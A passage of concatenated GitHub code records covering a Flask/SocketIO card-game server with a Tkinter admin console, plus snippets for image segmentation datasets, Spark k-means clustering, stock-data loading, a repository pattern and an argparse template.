poly_model = make_pipeline(PolynomialFeatures(3),\n LinearRegression())\n poly_model.fit(np.array(self.x_values).reshape(-1,1),np.array(self.y_values).reshape(-1,1))\n print(poly_model.predict(np.array(self.intra_x_values).reshape(-1,1)))\n\n def graph_intra_val(self):\n #self.data_to_function()\n fig = plt.figure()\n subplot = fig.add_subplot(111)\n p = subplot.plot(self.x_values+self.intra_x_values,self.y_values+self.intra_y_values[0])\n fig.show()\n\n def find_lowest_price(self):\n price = min(self.intra_y_values)\n dic_intra = {key:value for key, value in zip(intra_x_values, intra_y_values)}\n #returns the day\n\n return [key for key,value in dic_intra if value == price]\n\n\n\ntest_interpreter = Interpreter('', 'camera.txt', 'camera_data.txt',30)\nmyinterpreter = Interpreter('', 'phone.txt', 'phone_data.txt', 30)\n","repo_name":"vickymmcd/AmazonSoftDesWarriors","sub_path":"old_code/krogh_interpreter.py","file_name":"krogh_interpreter.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71914174911","text":"import abc\nfrom typing import Type, Union, List\nimport sqlalchemy as sql\n\nfrom domains import models\n\n\nclass AbstractRepository(abc.ABC):\n def __init__(self):\n self.cache = {}\n\n def add(\n self,\n model: Type[models.Model],\n *args,\n **kwargs,\n ):\n self._add(model)\n model_type = type(model)\n self.cache[model_type][model.id] = model\n\n def get(\n self,\n model_type: Type[models.Model],\n many: bool = False,\n *args,\n **kwargs,\n ) -> Union[List[Type[models.Model]], Type[models.Model]]:\n result = self._get(*args, **kwargs)\n if result is not None:\n if model_type not in self.cache:\n self.cache[model_type] = {}\n if many:\n for model in result:\n self.cache[model_type][model.id] = model\n else:\n self.cache[model_type][result.id] = result\n return result\n\n @abc.abstractmethod\n def _add(\n self,\n model: Type[models.Model],\n *args,\n **kwargs,\n ):\n raise NotImplementedError\n\n @abc.abstractmethod\n def _get(\n self,\n model_type: Type[models.Model],\n many: bool = False,\n *args,\n **kwargs,\n ) -> Union[List[Type[models.Model]], Type[models.Model]]:\n raise NotImplementedError\n\n\nclass SQLAlchemyRepository(AbstractRepository):\n def __init__(self, session):\n super().__init__()\n self.session = session\n\n def _add(\n self,\n model: Type[models.Model],\n *args,\n **kwargs,\n ):\n self.session.add(model)\n\n def _get(\n self,\n model_type: Type[models.Model],\n many: bool = False,\n *args,\n **kwargs,\n ) -> Union[List[Type[models.Model]], Type[models.Model]]:\n result = self.session.query(model_type).filter_by(**kwargs)\n if many:\n return result.all()\n return result.first()\n","repo_name":"hjjddb/hus-user-service","sub_path":"src/user_service/infrastructures/dependencies/repositories.py","file_name":"repositories.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21936520792","text":"import datetime\nimport time\n\nutc_now = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)\nutc_now_tsp: int = int(utc_now.timestamp())\n\nmonotonic_time = time.monotonic()\n\nif __name__ == '__main__':\n print(\n f\"Monotonic UTC now: {utc_now.isoformat()} or {utc_now_tsp} \"\n f\"({monotonic_time:.3f} seconds since epoch)\")\n","repo_name":"smartleohu/PythonWithDDD","sub_path":"solutions/utils/datetimes.py","file_name":"datetimes.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"24944833995","text":"import os\nimport random\nimport sys\nimport threading\nimport tkinter as tk\nfrom tkinter import ttk\nimport traceback\nfrom tkinter.scrolledtext import ScrolledText\nfrom webbrowser import open as web_open\nimport eventlet\nimport eventlet.wsgi\n\nimport flask\nimport flask_cors\nimport flask_socketio\nfrom waitress import serve\n\napp = flask.Flask(\"Poker\")\nflask_cors.CORS(app)\nsock = flask_socketio.SocketIO(app)\n\n# RULES:\nclass Rules:\n bypassButterFlies = False\n\nrules = Rules()\n\n\nwin = tk.Tk()\nwin.title(\"Manager\")\nimgicon = tk.PhotoImage(file='ico.png')\nwin.tk.call('wm', 'iconphoto', win._w, imgicon)\nwin.attributes(\"-topmost\",True)\nwin.geometry(\"800x450\")\ns = ScrolledText(win, insertwidth=1,font=(\"Segoe UI\",10))\n# s.config(width=0,height=0)\ns.bind(\"\", lambda e: \"break\")\ns.pack(expand='yes',fill=\"both\",padx=5,pady=3)\nt=ttk.Entry(win,font=(\"Segoe UI\",10))\nt.pack(fill=\"x\",padx=5,pady=3)\nwin.protocol(\"WM_DELETE_WINDOW\",lambda:os.kill(os.getpid(),2))\nspotIdDict = {}\n\ndef log(h,c,d,gt=True):\n o = s.index(tk.INSERT)\n s.insert(\"end\",f\"\\r[{h}] Called {c}: {d}\\n\")\n s.see(\"end\")\n line,char = o.split(\".\")\n s.tag_add(\"brack\",o,f\"{line}.{int(char)+3+len(h)}\")\n s.tag_add(\"fun\",f\"{line}.{int(char)+3+len(h)}\",f\"{line}.{int(char)+3+len(h)+len(c)+9}\")\n s.tag_add(\"args\",f\"{line}.{int(char)+3+len(h)+len(c)+9}\",f\"{line}.{int(char)+3+len(h)+len(c)+10+len(str(d))}\")\n\ndef eventl(_=None):\n def puts(e):\n s.insert(\"end\",str(e)+\"\\n\")\n s.see('end')\n cmd = t.get()\n if cmd.lower() ==\"globals\":\n puts(globals())\n elif cmd.startswith(\">\"):\n try:\n puts(eval(cmd[1:]))\n except SystemExit:\n puts(\"Exit\")\n os.kill(os.getpid(),2)\n except Exception:\n o = s.index(tk.INSERT)\n puts(traceback.format_exc())\n n = s.index(tk.INSERT)\n s.tag_add(\"exc\",o,n)\n elif cmd.startswith(\"!\"):\n try:\n exec(cmd[1:])\n except SystemExit:\n puts(\"Exit\")\n os.kill(os.getpid(), 2)\n except Exception:\n o = s.index(tk.INSERT)\n puts(traceback.format_exc())\n n = s.index(tk.INSERT)\n s.tag_add(\"exc\", o, n)\n elif cmd.startswith(\"$\"):\n puts(os.popen(cmd[1:]+\" 2>&1\").read())\n elif cmd.lower() == \"exit\":\n puts(\"Exit\")\n os.kill(os.getpid(),2)\n elif cmd.lower().startswith(\"attr\"):\n args = cmd.split(\" \")\n if len(args)!=4:\n puts(\"Syntax error, format: attr \")\n return\n _,obj,attr,val = args\n try:\n exec(f\"{obj}.{attr} = {val}\")\n puts(f\"Set {obj}.{attr} to {val}\")\n except:\n puts(\"Syntax error\")\n elif cmd.lower().startswith(\"gattr\"):\n args = cmd.split(\" \")\n if len(args) != 3:\n puts(\"Syntax error, format: gattr \")\n return\n _, obj, attr = args\n try:\n puts(eval(f\"{obj}.{attr}\"))\n except:\n puts(\"Syntax error\")\n elif cmd.lower().startswith(\"lattr\"):\n args = cmd.split(\" \")\n if len(args) != 2:\n puts(\"Syntax error, format: gattr \")\n return\n _, obj = args\n try:\n it = globals()\n for i in obj.split(\".\"):\n it = it[i].__dict__\n puts(it)\n except KeyError:\n puts(\"Variable error\")\n except:\n puts(\"Error\")\n elif cmd.lower().startswith(\"rule\"):\n args = cmd.split(\" \")\n if len(args)!=3:\n puts(\"Syntax error, format: \")\n return\n _,obj,attr = args\n if hasattr(rules,obj):\n try:\n setattr(rules,obj,eval(attr))\n puts(f\"Set rules.{obj} to {attr}\")\n except:\n puts(f\"Invalid python: '{attr}'\")\n return\n else:\n puts(\"No attribute named \"+obj)\n elif cmd.lower().startswith(\"aler\"):\n args = cmd.split(\" \")\n with app.app_context():\n sock.emit(\"alert\",{\"msg\":\" \".join(args[1:])},broadcast=True)\n \n elif cmd.lower() == \"open\":\n web_open(\"http://127.0.0.1:80\")\n elif cmd.lower() == \"help\":\n w = tk.Toplevel(win)\n tex = tk.Text(w,insertwidth=1)\n w.title(\"Help\")\n w.attributes(\"-topmost\",True)\n tex.bind(\"\",lambda i:\"break\")\n tex.pack(expand=\"yes\",fill=\"both\")\n tex.insert(\"0.0\",\"\"\"\\\n Command | Description\n \nglobals View globals\n> expr:Expr Execute expression [expr] and print result\n! code:Str Execute code [code]\n$ cmd:Str Execute [cmd] in the shell, print result.\nattr obj:Var attr:Attrib val:Expr Set [obj].[attr] to [val]\ngattr obj:Var attr:Attrib Get [obj].[attr]\nclear Clear logs\nreload Re-open script\nexit Quit\nopen Open in browser\nrule rule:Rule value:Expr Set rule [rule] to [value], possible rules are: bypassButterFlies\nlattr obj:Var Get attributes of [obj]\nstat Get status (spots,cards)\naler Alert (message)\n\"\"\")\n elif cmd.lower() == \"reload\":\n os.execv(sys.executable, ['python'] + sys.argv)\n elif cmd.lower() == \"clear\":\n s.delete(\"1.0\",\"end\")\n elif cmd.lower() == \"stat\":\n w = tk.Toplevel(win)\n tex = tk.Text(w, insertwidth=1)\n w.title(\"Help\")\n w.attributes(\"-topmost\", True)\n tex.bind(\"\", lambda i: \"break\")\n tex.pack(expand=\"yes\", fill=\"both\")\n for i in [*range(1,6+1)]+[\"Deck\"]:\n tex.insert(\"end\",\nf\"\"\"\\\nNUMBER: {i}\nNAME: '{cards.gindex(i).name}'\nTOTALPOINTS: {cards.gindex(i).tPts}\nPOINTS: {cards.gindex(i).pts}\nCARDS: {cards.gindex(i).cards}\nSENTCARDS: {cards.gindex(i).sent}\n\"\"\")\n \n elif cmd == \"\":\n pass\n else:\n puts(\"Not a command.\")\n t.delete(\"0\", \"end\")\n\nt.bind(\"\",eventl)\n\nclass Player:\n def __init__(self):\n self.pts = 0\n self.tPts = 0\n self.cards = []\n self.sent = []\n self.name = \"[EMPTY SPOT]\"\n def __repr__(self):\n return(f\"Player({self.__dict__})\")\n\nclass Cards:\n def __init__(self):\n self.p1=Player()\n self.p2=Player()\n self.p3=Player()\n self.p4=Player()\n self.p5=Player()\n self.p6=Player()\n self.pDeck = Player()\n def generate(self):\n log(\"SCRIPT\",\"Cards.generate\",\"\",gt=False)\n for i in range(1,6+1):\n exec(f\"self.p{i}.cards = []\")\n exec(f\"self.p{i}.sent = []\")\n exec(f\"self.p{i}.pts = 0\")\n cards = list(range(1,216+1))\n random.shuffle(cards)\n\n self.pDeck.cards = cards[:6]\n self.pDeck.sent = []\n self.pDeck.pts = 0\n\n g=0\n for i in cards[6:]:\n g+=1\n exec(f\"self.p{g}.cards.append(i)\")\n if g==6:\n g=0\n log(\"SCRIPT\",\"Cards.generate\",self.__dict__,gt=False)\n # with app.test_request_context(\"/\"):\n # flask_socketio.emit(\"restart\",{self.p1,self.p2,self.p3,self.p4,self.p5,self.p6},broadcast=True,include_self=True,namespace=\"/\")\n def gindex(self,index) -> Player:\n return getattr(self,f\"p{index}\")\n\nclass DicePlayerStatus:\n TAKEN = 1\n AVAIL = 2\n\nclass DicePlayer:\n def __init__(self):\n self.status = DicePlayerStatus.AVAIL\n\nclass DiceRoller():\n def __init__(self):\n self.p1 = DicePlayer()\n self.p2 = DicePlayer()\n self.p3 = DicePlayer()\n self.p4 = DicePlayer()\n self.p5 = DicePlayer()\n self.p6 = DicePlayer()\n def gindex(self,index) -> DicePlayer:\n return getattr(self, f\"p{index}\")\n\ns.tag_config(\"exc\",foreground=\"red\")\ns.tag_config(\"brack\",foreground=\"blue\")\ns.tag_config(\"fun\",foreground=\"green\")\ns.tag_config(\"args\",foreground=\"orange\")\n\ndef exc(f):\n def e(*args,**kwargs):\n try:\n f(*args,**kwargs)\n except:\n o = s.index(tk.INSERT)\n log(\"ERROR\",f.__name__,\"\\n\"+traceback.format_exc())\n n = s.index(tk.INSERT)\n s.tag_add(\"exc\",o,n)\n return e\n\ncards = Cards()\ncards.generate()\n\nspots = DiceRoller()\n\n@sock.on(\"get_player\")\n@exc\ndef get_player(data):\n log(\"SCRIPT\",\"get_player\",data)\n flask_socketio.emit(\"recieve_player_data\",{1:spots.p1.status,2:spots.p2.status,3:spots.p3.status,4:spots.p4.status,5:spots.p5.status,6:spots.p6.status})\n\n@sock.on(\"take_spot\")\n@exc\ndef take_spot(data):\n log(\"SCRIPT\", \"take_spot\", str(data)+f\" old:{spots.gindex(data['spot']).status}\")\n if not rules.bypassButterFlies:\n spots.gindex(data[\"spot\"]).status = DicePlayerStatus.TAKEN\n spotIdDict[flask.request.sid] = data['spot']\n flask_socketio.emit(\"take_spot\",{'spot':data['spot']},broadcast=True)\n else:\n log(\"RULES\",\"take_spot\",\"bypassButterFlies is true.\")\n\n@sock.on(\"disconnect\")\n@exc\ndef take_spot():\n data = spotIdDict[flask.request.sid]\n log(\"SCRIPT\",\"DISCONNECT\",data)\n if not rules.bypassButterFlies:\n spots.gindex(data).status = DicePlayerStatus.AVAIL\n flask_socketio.emit(\"avail_spot\",{'spot':data},broadcast=True)\n else:\n log(\"RULES\",\"avail_spot\",\"bypassButterFlies is true.\")\n\n@sock.on(\"hmsg\")\n@exc\ndef msg(dt):\n flask_socketio.emit(\n \"alert\", {'msg': dt[\"text\"]}, broadcast=True, include_self=True)\n\n@sock.on('init_cards')\n@exc\ndef init_cards(data):\n log(\"SCRIPT\",\"init_cards\",data)\n cards.gindex(data[\"player\"]).name = data[\"name\"]\n flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True)\n\n@sock.on(\"mov_cards\")\n@exc\ndef mov_cards(data):\n log(\"SCRIPT\",\"mov_cards\",data)\n if data[\"type\"] == \"LTR\": # Cards to sent\n cards.gindex(data[\"player\"]).cards.remove(data[\"card\"])\n cards.gindex(data[\"player\"]).sent.append(data[\"card\"])\n if data[\"type\"] == \"RTL\": # Sent to cards\n cards.gindex(data[\"player\"]).sent.remove(data[\"card\"])\n cards.gindex(data[\"player\"]).cards.append(data[\"card\"])\n flask_socketio.emit(\"mov_cards\",{\"player\":data[\"player\"],\"card\":data[\"card\"],\"type\":data[\"type\"]},broadcast=True,include_self=True)\n\n@sock.on(\"score\")\n@exc\ndef score(data):\n log(\"SCRIPT\",\"score\",data)\n cards.gindex(data[\"player\"]).pts+=data[\"pts\"]\n flask_socketio.emit(\"score\",{\"player\":data[\"player\"],\"pts\":cards.gindex(data[\"player\"]).pts},broadcast=True,include_self=True)\n\n@sock.on(\"totScore\")\n@exc\ndef tscore(data):\n log(\"SCRIPT\",\"totScore\",data)\n cards.gindex(data['player']).tPts=data[\"pts\"]\n flask_socketio.emit(\"totScore\",{\"player\":data[\"player\"],\"pts\":data[\"pts\"]},broadcast=True,include_self=True)\n\n@sock.on(\"name\")\n@exc\ndef name(data):\n log(\"SCRIPT\",\"name\",data)\n cards.gindex(data['player']).name = data['name']\n flask_socketio.emit(\"name\",{\"player\":data[\"player\"],\"name\":data[\"name\"]},broadcast=True,include_self=True)\n\n@sock.on(\"reset\")\n@exc\ndef reset(data=None):\n log(\"SCRIPT\",\"reset\",data)\n cards.generate()\n flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True)\n\n@sock.on(\"set_deck\")\n@exc\ndef setDeck(data):\n log(\"SCRIPT\",\"set_deck\",data)\n cards.pDeck.cards = data[\"deck\"]\n flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True)\n\n@sock.on(\"set_player\")\n@exc\ndef setPlayer(data):\n log(\"SCRIPT\",\"set_player\",data)\n cards.gindex(data[\"player\"]).cards = data['cards']\n\n@sock.on(\"movCardD\")\n@exc\ndef movCardD(data):\n log(\"SCRIPT\",\"movCardD\",data)\n if data[\"type\"]==\"DTC\": # Deck to card\n log(\"LOG\",'movCardD: cards: data[\"player\"]',cards.gindex(data['player']).cards)\n cards.gindex(data['player']).cards.append(data['card'])\n cards.pDeck.cards.remove(data['card'])\n if data['type']==\"CTD\": # Card to deck\n cards.pDeck.cards.append(data['card'])\n cards.gindex(data['player']).cards.remove(data['card'])\n flask_socketio.emit(\"recieve\",{1:cards.p1.__dict__,2:cards.p2.__dict__,3:cards.p3.__dict__,4:cards.p4.__dict__,5:cards.p5.__dict__,6:cards.p6.__dict__,\"all\":cards.pDeck.__dict__},broadcast=True,include_self=True) \n\n@sock.on(\"message\")\n@exc\ndef lg(dt):\n log(\"SCRIPT\",\"socket\",dt)\n\n@sock.on(\"clearPlr\")\n@exc\ndef clearPlr(p):\n log(\"SCRIPT\",\"clearPlr\",p)\n cards.gindex(p[\"p\"]).sent = []\n flask_socketio.emit(\"recieve\", {1: cards.p1.__dict__, 2: cards.p2.__dict__, 3: cards.p3.__dict__, 4: cards.p4.__dict__,\n 5: cards.p5.__dict__, 6: cards.p6.__dict__, \"all\": cards.pDeck.__dict__}, broadcast=True, include_self=True)\n\n@app.route(\"/\")\ndef path(path):\n if path.startswith(\"images/\"):\n pass # Useless information, do not log\n else:\n log(f\"REQUEST ({flask.request.remote_addr})\",\n path, flask.request.method)\n if os.path.exists(path):\n return flask.send_file(path)\n else:\n flask.abort(404)\n\n@app.route(\"/\")\ndef root():\n log(\"REQUEST\",\"/\",flask.request.method)\n return flask.send_file(\"index.html\")\n\n@app.after_request\ndef add_header(r):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n r.headers['Cache-Control'] = 'public, max-age=0'\n return r\n\ndef init():\n eventlet.monkey_patch()\n sock.run(app,host=\"0.0.0.0\",port=80)\nthreading.Thread(target=init).start()\ntry:\n t.focus_force()\n win.mainloop()\nexcept KeyboardInterrupt:\n print(\"Exit\")\n","repo_name":"maxjiang2021/game","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":14556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"6743898437","text":"import glob, tempfile, os\nimport PIL.Image\nimport numpy as np\nimport torch, torchvision\n\n\nWHITE = (255,255,255)\nGREEN = ( 0,255, 0)\nRED = (255, 0, 0)\nBLUE = ( 0, 0,255)\nBLACK = ( 0, 0, 0)\n\n\nclass Dataset:\n def __init__(self, inputfiles, targetfiles, patchsize=512, augment=False, colors=[WHITE, GREEN], tmpdir='.'):\n self.augment = augment\n self.patchsize = patchsize\n self.colors = colors\n self.inputfiles = inputfiles\n self.targetfiles = targetfiles\n self.cachedir = tempfile.TemporaryDirectory(prefix='delete_me_cache_', dir=tmpdir)\n print(self.cachedir.name)\n self.n_patches = self._load_and_cache_all(inputfiles, targetfiles)\n\n self.transform = torchvision.transforms.Compose([torchvision.transforms.ToTensor()])\n if self.augment:\n self.transform.transforms += [\n torchvision.transforms.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.2, hue=0.02)\n ]\n \n def _load_and_cache_all(self, imagefiles, targetfiles):\n i = 0\n for image_f, target_f in zip(imagefiles, targetfiles):\n image = PIL.Image.open(image_f).convert('RGB') * np.uint8(1)\n target = self.load_target_image(target_f)\n assert image.shape[:2] == target.shape[:2]\n image_patches = slice_into_patches_with_overlap(image, self.patchsize)\n target_patches = slice_into_patches_with_overlap(target[...,np.newaxis], self.patchsize)\n for image_p, target_p in zip(image_patches, target_patches):\n PIL.Image.fromarray(image_p).save(self.cachedir.name+f'/{i}.jpg', quality=100)\n PIL.Image.fromarray(target_p.squeeze()).save(self.cachedir.name+f'/{i}.png')\n i += 1\n return i\n \n def __len__(self):\n return self.n_patches\n def __getitem__(self, i):\n image = PIL.Image.open(self.cachedir.name+f'/{i}.jpg') / np.float32(255)\n target = PIL.Image.open(self.cachedir.name+f'/{i}.png') > np.float32(0.5)\n target = target[...,np.newaxis].astype(np.float32)\n #augmentation: flips and rotations\n image, target = (image[:,::-1], target[:,::-1]) if self.augment and np.random.random()<0.5 else (image,target)\n image, target = (image[::-1], target[::-1]) if self.augment and np.random.random()<0.5 else (image,target)\n k = np.random.randint(4) if self.augment else 0\n image, target = np.rot90(image, k), np.rot90(target, k)\n \n return self.transform(image.copy()), torchvision.transforms.ToTensor()(target.copy())\n \n def load_target_image(self, filename):\n img = PIL.Image.open(filename).convert('RGB') * np.int8(1)\n result = [np.abs(img - c).sum(-1) < 64 for c in self.colors]\n return np.any(result, axis=0)\n \n def create_dataloader(self, batch_size, shuffle=False, num_workers='auto'):\n if num_workers == 'auto':\n num_workers = os.cpu_count()\n return torch.utils.data.DataLoader(self, batch_size, shuffle,\n collate_fn=getattr(self, 'collate_fn', None),\n num_workers=num_workers, pin_memory=True,\n worker_init_fn=lambda x: np.random.seed(torch.randint(0,1000,(1,))[0].item()+x) )\n\n\n\ndef grid_for_patches(imageshape, patchsize, slack):\n H,W = imageshape[:2]\n stepsize = patchsize - slack\n grid = np.stack( np.meshgrid( np.minimum( np.arange(patchsize, H+stepsize, stepsize), H ), \n np.minimum( np.arange(patchsize, W+stepsize, stepsize), W ), indexing='ij' ), axis=-1 )\n grid = np.concatenate([grid-patchsize, grid], axis=-1)\n grid = np.maximum(0, grid)\n return grid\n\ndef slice_into_patches_with_overlap(image, patchsize=1024, slack=32):\n grid = grid_for_patches(image.shape, patchsize, slack)\n patches = [image[i0:i1, j0:j1] for i0,j0,i1,j1 in grid.reshape(-1, 4)]\n return patches\n\ndef stitch_overlapping_patches(patches, imageshape, slack=32, out=None):\n patchsize = patches[0].shape[0]\n grid = grid_for_patches(imageshape, patchsize, slack)\n halfslack = slack//2\n i0,i1 = (grid[grid.shape[0]-2,grid.shape[1]-2,(2,3)] - grid[-1,-1,(0,1)])//2\n d0 = np.stack( np.meshgrid( [0]+[ halfslack]*(grid.shape[0]-2)+[ i0]*(grid.shape[0]>1),\n [0]+[ halfslack]*(grid.shape[1]-2)+[ i1]*(grid.shape[1]>1), indexing='ij' ), axis=-1 )\n d1 = np.stack( np.meshgrid( [-halfslack]*(grid.shape[0]-1)+[imageshape[0]], \n [-halfslack]*(grid.shape[1]-1)+[imageshape[1]], indexing='ij' ), axis=-1 )\n d = np.concatenate([d0,d1], axis=-1)\n if out is None:\n out = np.zeros(imageshape[:2]+patches[0].shape[2:], dtype=patches[0].dtype)\n for patch,gi,di in zip(patches, d.reshape(-1,4), (grid+d).reshape(-1,4)):\n out[di[0]:di[2], di[1]:di[3]] = patch[gi[0]:gi[2], gi[1]:gi[3]]\n return out\n\n","repo_name":"ExPlEcoGreifswald/RootDetector","sub_path":"models_src/2022-07-11_029/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":5152,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"19880486623","text":"from pyspark.mllib.clustering import KMeans\nfrom pyspark import SparkContext\nimport dautil as dl\nimport csv\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib.colors import Normalize\n\n\ndef error(point, clusters):\n center = clusters.centers[clusters.predict(point)]\n\n return dl.stats.wssse(point, center)\n\nsc = SparkContext()\ncsv_file = dl.data.get_direct_marketing_csv()\nlines = sc.textFile(csv_file)\nheader = lines.first().split(',')\ncols_set = set(['recency', 'history', 'spend'])\nselect_cols = [i for i, col in enumerate(header) if col in cols_set]\n\nheader_rdd = lines.filter(lambda l: 'recency' in l)\nnoheader_rdd = lines.subtract(header_rdd)\ntemp = noheader_rdd.map(lambda v: list(csv.reader([v]))[0])\\\n .map(lambda p: (int(p[select_cols[0]]),\n dl.data.centify(p[select_cols[1]]),\n dl.data.centify(p[select_cols[2]])))\n\n# spend > 0\ntemp = temp.filter(lambda x: x[2] > 0)\n\npoints = []\nclusters = None\n\nfor i in range(2, 28):\n clusters = KMeans.train(temp, i, maxIterations=10,\n runs=10, initializationMode=\"random\")\n\n val = temp.map(lambda point: error(point, clusters))\\\n .reduce(lambda x, y: x + y)\n points.append((i, val))\n\n\ndl.options.mimic_seaborn()\nfig, [ax, ax2] = plt.subplots(2, 1)\nax.set_title('k-means Clusters')\nax.set_xlabel('Number of clusters')\nax.set_ylabel('WSSSE')\ndl.plotting.plot_points(ax, points)\n\ncollected = temp.collect()\nrecency, history, spend = zip(*collected)\nindices = [clusters.predict(c) for c in collected]\nax2.set_title('Clusters for spend, history and recency')\nax2.set_xlabel('history (cents)')\nax2.set_ylabel('spend (cents)')\nmarkers = dl.plotting.map_markers(indices)\ncolors = dl.plotting.sample_hex_cmap(name='hot', ncolors=len(set(recency)))\n\nfor h, s, r, m in zip(history, spend, recency, markers):\n ax2.scatter(h, s, s=20 + r, marker=m, c=colors[r-1])\n\ncma = mpl.colors.ListedColormap(colors, name='from_list', N=None)\nnorm = Normalize(min(recency), max(recency))\nmsm = mpl.cm.ScalarMappable(cmap=cma, norm=norm)\nmsm.set_array([])\nfig.colorbar(msm, label='Recency')\n\nfor i, center in enumerate(clusters.clusterCenters):\n recency, history, spend = center\n ax2.text(history, spend, str(i))\n\nplt.tight_layout()\nplt.show()\n","repo_name":"PacktPublishing/PythonDataAnalysisCookbook","sub_path":"Chapter 5/clustering_spark.py","file_name":"clustering_spark.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"51"} +{"seq_id":"5942415629","text":"import pickle\r\nfrom conf import db_conf2\r\nfrom sqlalchemy import create_engine\r\nimport pandas as pd\r\nfrom functools import reduce\r\nfrom sqlalchemy.exc import IntegrityError\r\n\r\nengine = create_engine(db_conf2)\r\n\r\ndata = engine.execute('select date_format(trade_date, \"%Y%m%d\"),date_id from trade_date;').fetchall()\r\ndate_dict = dict(data)\r\n\r\nwork_dirs = ['day_tick', 'daily_basic', 'adj_factor', 'money_flow']\r\nsuffix = '.pkl'\r\n\r\nfor date in date_dict.keys():\r\n print(f'processing data on {date}')\r\n df_list = []\r\n for i in work_dirs:\r\n with open(f'raw/{i}/{i}_{date}{suffix}', 'rb') as f:\r\n dd = pickle.load(f)\r\n df_list.append(dd)\r\n f.close()\r\n df_list[0].drop(['trade_date'], axis=1, inplace=True)\r\n df_list[1].drop(['trade_date', 'close'], axis=1, inplace=True)\r\n df_list[2].drop(['trade_date'], axis=1, inplace=True)\r\n df_list[3].drop(['trade_date'], axis=1, inplace=True)\r\n # for i in df_list:\r\n # print(i)\r\n\r\n df = reduce(lambda x, y: x.join(y.set_index('ts_code'), on='ts_code', how='left'), df_list)\r\n\r\n # df.to_sql('sz000001', con=engine, if_exists='append', index=False)\r\n\r\n for i in range(len(df)):\r\n s = df.iloc[i:i + 1, :]\r\n ts_code = s.iloc[0]['ts_code'].split('.')\r\n table_name = ts_code[1].lower() + ts_code[0]\r\n print(f'\\tprocessing {ts_code}')\r\n ddd = s[['open', 'high', 'low', 'close', 'pre_close', 'change',\r\n 'pct_chg', 'vol', 'amount', 'turnover_rate', 'turnover_rate_f',\r\n 'volume_ratio', 'pe', 'pe_ttm', 'pb', 'ps', 'ps_ttm', 'total_share',\r\n 'float_share', 'free_share', 'total_mv', 'circ_mv', 'adj_factor',\r\n 'buy_sm_vol', 'buy_sm_amount', 'sell_sm_vol', 'sell_sm_amount',\r\n 'buy_md_vol', 'buy_md_amount', 'sell_md_vol', 'sell_md_amount',\r\n 'buy_lg_vol', 'buy_lg_amount', 'sell_lg_vol', 'sell_lg_amount',\r\n 'buy_elg_vol', 'buy_elg_amount', 'sell_elg_vol', 'sell_elg_amount',\r\n 'net_mf_vol', 'net_mf_amount']]\r\n ddd['date_id'] = date_dict[date]\r\n ddd['active'] = True\r\n try:\r\n ddd.to_sql(table_name, con=engine, if_exists='append', index=False)\r\n except Exception as e:\r\n if isinstance(e, IntegrityError):\r\n print(f'duplicate entry for {table_name} on {date}, ignored')\r\n else:\r\n print(e)\r\n break\r\n","repo_name":"Archie2k16/tsquant","sub_path":"tick_data/update_tick_data.py","file_name":"update_tick_data.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14065040178","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Me \nDate : today\nPurpose: Rock the Casbah\n\"\"\"\n\nimport argparse\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"Get command-line arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Rock the Casbah',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('positional',\n metavar='str',\n help='A positional argument')\n\n parser.add_argument('-a',\n '--arg',\n help='A named string argument',\n metavar='str',\n type=str,\n default='')\n\n parser.add_argument('-i',\n '--int',\n help='A named integer argument',\n metavar='int',\n type=int,\n default=0)\n\n parser.add_argument('-f',\n '--file',\n help='A readable file',\n metavar='FILE',\n type=argparse.FileType('r'),\n default=None)\n\n parser.add_argument('-o',\n '--on',\n help='A boolean flag',\n action='store_true')\n\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n\n args = get_args()\n str_arg = args.arg\n int_arg = args.int\n file_arg = args.file\n flag_arg = args.on\n pos_arg = args.positional\n\n print(f'str_arg = \"{str_arg}\"')\n print(f'int_arg = \"{int_arg}\"')\n print('file_arg = \"{}\"'.format(file_arg.name if file_arg else ''))\n print(f'flag_arg = \"{flag_arg}\"')\n print(f'positional = \"{pos_arg}\"')\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n 